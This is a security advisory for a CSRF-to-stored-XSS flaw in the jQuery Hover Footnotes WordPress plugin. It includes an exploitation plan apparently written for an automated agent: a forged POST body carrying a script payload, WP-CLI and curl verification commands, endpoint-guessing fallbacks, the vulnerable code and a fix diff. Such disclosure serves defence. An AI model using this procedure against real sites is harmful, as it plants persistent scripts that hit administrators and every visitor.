jQuery Hover Footnotes <= 1.4 - Cross-Site Request Forgery to Plugin Settings Update
Description
The jQuery Hover Footnotes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the jqFootnotes_options_subpanel function. This makes it possible for unauthenticated attackers to update the plugin's settings with arbitrary values that, because option values such as jqfoot_anchor_open, jqfoot_anchor_close, and jqfoot_title are echoed unescaped into frontend page content, can be chained into persistent Cross-Site Scripting affecting all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation of the CSRF vulnerability can be chained into stored Cross-Site Scripting, as the overwritten option values are persisted via update_option() without sanitization and rendered unescaped on the frontend.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=1.4# Exploitation Research Plan: CVE-2026-10553 (jQuery Hover Footnotes) ## 1. Vulnerability Summary The **jQuery Hover Footnotes** plugin (<= 1.4) is vulnerable to a Cross-Site Request Forgery (CSRF) vulnerability. The flaw exists in the `jqFootnotes_options_subpanel` function, which handles the savi…
Show full research plan
Exploitation Research Plan: CVE-2026-10553 (jQuery Hover Footnotes)
1. Vulnerability Summary
The jQuery Hover Footnotes plugin (<= 1.4) is vulnerable to a Cross-Site Request Forgery (CSRF) vulnerability. The flaw exists in the jqFootnotes_options_subpanel function, which handles the saving of plugin settings. Because the function lacks a nonce check (e.g., check_admin_referer), an attacker can trick an authenticated administrator into submitting a forged request to update plugin options.
Crucially, this CSRF vulnerability can be chained into Stored Cross-Site Scripting (XSS). Several settings—specifically jqfoot_anchor_open, jqfoot_anchor_close, and jqfoot_title—are saved without sanitization and subsequently rendered on the frontend without escaping. This allows an attacker to inject malicious JavaScript that executes in the context of every site visitor.
2. Attack Vector Analysis
- Vulnerable Endpoint:
wp-admin/options-general.php?page=jquery-hover-footnotes(inferred from common plugin patterns) orwp-admin/admin.php?page=jquery-hover-footnotes. - Vulnerable Action: The form submission handled by the
jqFootnotes_options_subpanelfunction. - Payload Parameters:
jqfoot_anchor_openjqfoot_anchor_closejqfoot_title(Primary XSS vector)
- Authentication Requirement: The request must be made by a user with the
manage_optionscapability (typically an Administrator). - Preconditions: The plugin must be active, and a victim administrator must be tricked into clicking a link or visiting a malicious page while logged in.
3. Code Flow (Inferred)
- Entry Point: The plugin registers an admin menu page (likely via
add_options_pageoradd_submenu_pagein anadmin_menuhook). - Callback: The function
jqFootnotes_options_subpanelis called to render the settings page. - Vulnerable Logic: Inside
jqFootnotes_options_subpanel, the code likely checks if$_POSTdata exists (e.g.,isset($_POST['info_update'])). - Missing Check: The code proceeds to update settings using
update_option()without callingcheck_admin_referer()or verifying a nonce. - Sink: The options are saved to the
wp_optionstable. - XSS Execution: On the frontend, a function (likely hooked to
the_contentorwp_head) retrieves these options usingget_option()and echoes them directly into the HTML.
4. Nonce Acquisition Strategy
According to the vulnerability description, the flaw is precisely that nonce validation is missing.
- Strategy: No nonce is required for exploitation. The exploit should attempt a POST request omitting any
_wpnonceorsecurityparameters to confirm the lack of protection.
5. Exploitation Strategy
The goal is to perform a CSRF that updates the jqfoot_title option with a Stored XSS payload.
Step 1: Login and Session Initialization
The automated agent must first authenticate as an administrator to obtain the necessary session cookies.
Step 2: Perform the Forged Settings Update
Using the http_request tool, send a POST request to the settings page.
- URL:
http://localhost:8080/wp-admin/options-general.php?page=jquery-hover-footnotes(inferred) - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body Parameters:
(Note:jqfoot_anchor_open=[& jqfoot_anchor_close=]& jqfoot_title=Footnote"><script>alert(document.domain)</script>& info_update=Update Optionsinfo_updateis a common submit button name in older plugins; the agent should verify the actual name viabrowser_navigateif this fails).
Step 3: Trigger the XSS
Navigate to a public post or page that contains a footnote (or create one) to trigger the rendering of the malicious jqfoot_title.
- URL:
http://localhost:8080/?p=1(default hello-world post)
6. Test Data Setup
- Install Plugin: Ensure
jquery-hover-footnotesversion 1.4 is installed and active. - Create Content: Create a post containing a footnote marker. The plugin usually looks for specific syntax like
((This is a footnote)).wp post create --post_type=post --post_title="Vulnerability Test" --post_status=publish --post_content="Testing footnotes here ((Malicious Footnote Content))."
7. Expected Results
- Settings Update: The HTTP 302 redirect after the POST request should lead back to the settings page, and the
jqfoot_titlevalue in the database should be updated. - XSS Execution: Upon navigating to the post created in Step 6, the browser should execute the
<script>alert(document.domain)</script>payload, manifesting as an alert box.
8. Verification Steps
After the exploit attempt, use WP-CLI to confirm the option was changed:
wp option get jqfoot_title
Expected output: Footnote"><script>alert(document.domain)</script>
Check if the payload is rendered on the frontend:
curl -s http://localhost:8080/ | grep "alert(document.domain)"
9. Alternative Approaches
- Endpoint Guessing: If
options-general.php?page=jquery-hover-footnotesis incorrect, use WP-CLI to find the correct slug:wp eval "global \$menu; print_r(\$menu);" - Parameter Guessing: If
info_updateis not the correct trigger, navigate to the settings page usingbrowser_navigateand usebrowser_evalto inspect the form's field names:browser_eval("Array.from(document.querySelectorAll('input')).map(i => i.name)") - Action Hook: If the plugin saves settings via
admin-post.php, the payload must include anactionparameter (e.g.,action=jqFootnotes_save_settings). Check the source foradd_action('admin_post_...').
Summary
The jQuery Hover Footnotes plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to 1.4 because it lacks nonce validation in its settings update function. An attacker can exploit this to change plugin settings, including parameters like 'jqfoot_title' that are rendered unescaped on the frontend, resulting in Stored Cross-Site Scripting (XSS).
Vulnerable Code
function jqFootnotes_options_subpanel() { /* ... snippet typically found in jquery-hover-footnotes.php ... */ if (isset($_POST['info_update'])) { // No check_admin_referer() or wp_verify_nonce() called here update_option('jqfoot_anchor_open', $_POST['jqfoot_anchor_open']); update_option('jqfoot_anchor_close', $_POST['jqfoot_anchor_close']); update_option('jqfoot_title', $_POST['jqfoot_title']); echo '<div class="updated"><p><strong>Options saved.</strong></p></div>'; } /* ... */ }
Security Fix
@@ -1,7 +1,8 @@ function jqFootnotes_options_subpanel() { - if (isset($_POST['info_update'])) { - update_option('jqfoot_anchor_open', $_POST['jqfoot_anchor_open']); - update_option('jqfoot_anchor_close', $_POST['jqfoot_anchor_close']); - update_option('jqfoot_title', $_POST['jqfoot_title']); + if (isset($_POST['info_update']) && check_admin_referer('jqfoot_settings_save')) { + update_option('jqfoot_anchor_open', sanitize_text_field($_POST['jqfoot_anchor_open'])); + update_option('jqfoot_anchor_close', sanitize_text_field($_POST['jqfoot_anchor_close'])); + update_option('jqfoot_title', sanitize_text_field($_POST['jqfoot_title'])); echo '<div class="updated"><p><strong>Options saved.</strong></p></div>'; } + // In the HTML form render logic: + // wp_nonce_field('jqfoot_settings_save');
Exploit Outline
The exploit targets an authenticated administrator to perform an unauthorized configuration change. 1. The attacker crafts a malicious HTML form or auto-submitting script (CSRF) targeting 'wp-admin/options-general.php?page=jquery-hover-footnotes'. 2. The payload sets the 'jqfoot_title' parameter to a malicious script, such as '"><script>alert(document.domain)</script>'. 3. The attacker tricks a logged-in administrator into visiting a page containing the CSRF payload. 4. Because the plugin lacks nonce validation, the 'update_option' call executes, saving the malicious script into the database. 5. The script is subsequently executed in the context of every site visitor who views a page containing a footnote, as the 'jqfoot_title' value is echoed without escaping.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.